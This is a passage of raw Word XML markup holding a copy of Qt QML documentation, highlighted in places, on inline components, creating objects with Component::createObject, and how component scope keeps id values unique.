          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>myComponent</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createObject</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root</w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD197D" w:rsidRPr="00906D8E" w:rsidRDefault="00AD197D" w:rsidP="00AD197D">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        myComponent</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createObject</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root</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pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"x"</w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>200</w:t>
      </w:r>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD197D" w:rsidRPr="00AD197D" w:rsidRDefault="00AD197D" w:rsidP="00AD197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D197D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD197D" w:rsidRPr="00AD197D" w:rsidRDefault="00AD197D" w:rsidP="00AD197D">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD197D" w:rsidRPr="00AD197D" w:rsidRDefault="00AD197D" w:rsidP="00AD197D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Here the</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>myComponent</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object essentially defines an anonymous type that can be instantiated using</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId151" w:anchor="createObject-method" w:history="1">
        <w:r w:rsidRPr="006F0F39">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Component::createObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to create objects of this anonymous type.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD197D" w:rsidRPr="00AD197D" w:rsidRDefault="00AD197D" w:rsidP="00AD197D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Inline components share all the characteristics of regular top-level components and use the same</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>list as their containing QML document.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD197D" w:rsidRPr="00AD197D" w:rsidRDefault="00AD197D" w:rsidP="00AD197D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note that each</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId152" w:history="1">
        <w:r w:rsidRPr="00AD197D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Component</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">object declaration </w:t>
      </w:r>
      <w:r w:rsidRPr="00297A80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">creates its </w:t>
      </w:r>
      <w:r w:rsidRPr="006F0F39">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>own</w:t>
      </w:r>
      <w:r w:rsidRPr="006F0F39">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F0F39">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>component scope</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00297A80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Any</w:t>
      </w:r>
      <w:r w:rsidRPr="00297A80">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00297A80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="00297A80">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00297A80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>values used and referred to from within a</w:t>
      </w:r>
      <w:r w:rsidRPr="00297A80">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId153" w:history="1">
        <w:r w:rsidRPr="00297A80">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Component</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00297A80">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00297A80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object declaration must be unique within that scope, but do not need to be unique within the document within which the inline component is declared</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. So, the</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId154" w:history="1">
        <w:r w:rsidRPr="00AD197D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Rectangle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>declared in the</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>myComponent</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object declaration could have an</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidR="00297A80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>without conflicting with the</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>declared for the</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId155" w:history="1">
        <w:r w:rsidRPr="00AD197D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object in the same document, as these two</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD197D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
